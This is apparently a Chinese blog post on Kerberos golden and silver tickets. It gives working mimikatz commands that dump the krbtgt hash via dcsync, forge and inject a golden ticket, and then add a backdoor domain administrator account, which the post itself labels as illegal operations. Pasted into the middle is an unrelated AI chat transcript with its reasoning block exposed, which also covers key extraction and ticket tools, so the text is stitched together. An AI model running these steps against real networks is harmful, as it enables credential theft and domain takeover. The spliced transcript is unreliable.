kerberos协议&黄金票据白银票据

本文介绍了内网渗透中如何使用Kerberos协议进行三方认证,包括通信过程图解,黄金票据和白银票据的应用,以及实战中如何利用Mimikatz工具生成、管理及执行非法操作,如获取NTLM哈希和添加域管理员账户。

一、名词解释

在内网渗透过程中,一些需要三方认证的场合就需要使用kerberos协议。

kerberos的前身是cerberos(地狱三头犬),很形象生动地描述了三方认证的这个场景。

二、通信过程图解

三、黄金票据&白银票据使用前提

四、实战中常用工具

cs、mimikatz等

mimikatz使用方法:

1.在普通域用户中使用mimikatz生成黄金票据.kirbi文件并保存
mimikatz log "lsadump::dcsync /domain:xiusafe /user:krbtgt"//导出NTLM哈希
kerberos::golden /user:administrator /domain:xxx.com /sid:S-1-5-21-3818247987-2711466351-3365387365 /krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi

/user:需要伪造的域管理员用户

/domain:域名称

/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!)

/krbtgt:krbtgt的HASH值

/ticket:生成的票据名称

2.清除历史票据
kerberos::purge   \\清除票据
kerberos::tgt     \\查看票据

3.导入票据
kerberos::ptt ticket.kirbi

4.非法操作(以创建域管理员为例)
net user a !@#qwe123 /add /domain
net group "domain admins" a /add /domain
<think>嗯,用户想了解Kerberos票据解密的相关内容。首先,我需要回忆一下Kerberos协议的基本流程。Kerberos是一种网络认证协议,使用票据来允许节点在非安全网络中证明身份,主要由密钥分发中心(KDC)、客户端和服务端组成。票据分为TGT(Ticket Granting Ticket)和Service Ticket两种,分别用于获取服务票据和访问具体服务。 用户提到的是票据解密,这可能涉及到票据的结构以及加密方式。Kerberos票据在传输过程中是加密的,只有特定的实体才能解密。比如,TGT是使用KDC的密钥加密的,而服务票据则是使用服务密钥加密的。因此,解密票据通常需要相应的密钥。 接下来要考虑用户可能的意图。他们可能对Kerberos安全机制感兴趣,或者想了解如何解密票据,比如在渗透测试或系统管理中遇到的场景。需要区分合法解密和未经授权的解密,强调合法性和权限的重要性,避免提供可能被滥用的信息。 需要解释Kerberos票据的结构,包括加密部分使用的算法,比如AES或RC4-HMAC。同时,说明在正常流程中,客户端和服务端如何通过共享的密钥来解密票据。例如,服务端使用自己的长期密钥解密服务票据,获取会话密钥,进而验证客户端的身份。 可能还需要提到攻击向量,比如黄金票据白银票据,这些涉及伪造票据的攻击手段,但需注意在介绍时强调这些是安全威胁,用于增强防御意识,而非操作指导。 用户可能存在的疑问点包括:如何获取解密所需的密钥?解密后的票据内容是什么?实际应用场景有哪些?需要逐一解答,但避免深入技术细节导致信息过载。 最后,确保回答符合系统级指令,正确使用LaTeX格式,如加密过程用$encrypt_{key}(data)$,解密函数用$decrypt_{key}(ciphertext)$等,保持结构清晰,分步骤解释。</think>Kerberos票据解密涉及Kerberos协议的核心安全机制,以下是分步说明: 1. **Kerberos票据结构** 票据主要包含: $$Ticket = encrypt_{K_{server}}(Session\ Key, Client\ Info, Timestamp, ...)$$ 其中: - $K_{server}$是服务密钥(长期密钥的哈希值) - 加密算法通常为AES或RC4-HMAC 2. **合法解密流程** a. **服务端解密**: 当服务端收到客户端提交的服务票据时,使用自己的$K_{server}$解密票据: $$decrypt_{K_{server}}(Ticket) \Rightarrow Session\ Key$$ b. **客户端验证**: 客户端使用$Session\ Key$解密服务端返回的验证信息 3. **密钥获取途径** - 合法场景:服务端从KDC数据库获取自己的$K_{server}$ - 渗透测试场景: - 通过域控制器提取krbtgt账户的NTLM哈希(需域管理员权限) - 使用mimikatz等工具导出内存中的密钥 4. **解密后的票据内容** 成功解密后包含: - 客户端主体名称 - 会话密钥$Session\ Key$ - 票据有效期(开始/结束时间) - 授权数据(用户组信息等) 5. **安全注意事项** - Kerberos使用$encrypt-then-MAC$结构保证完整性 - 票据默认存活时间10小时(可配置) - 防范黄金票据攻击需保护krbtgt账户 - 检测异常需监控:异常时间戳、重复票据号等 6. **典型工具示例** ```bash # 使用Impacket解密票据 ticketConverter administrator.ccache administrator.kirbi # 使用klist查看缓存票据 klist -l -c /tmp/krb5cc_1000 ``` 重要提示:票据解密操作应严格在授权范围内进行,非授权解密可能违反计算机安全相关法律。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值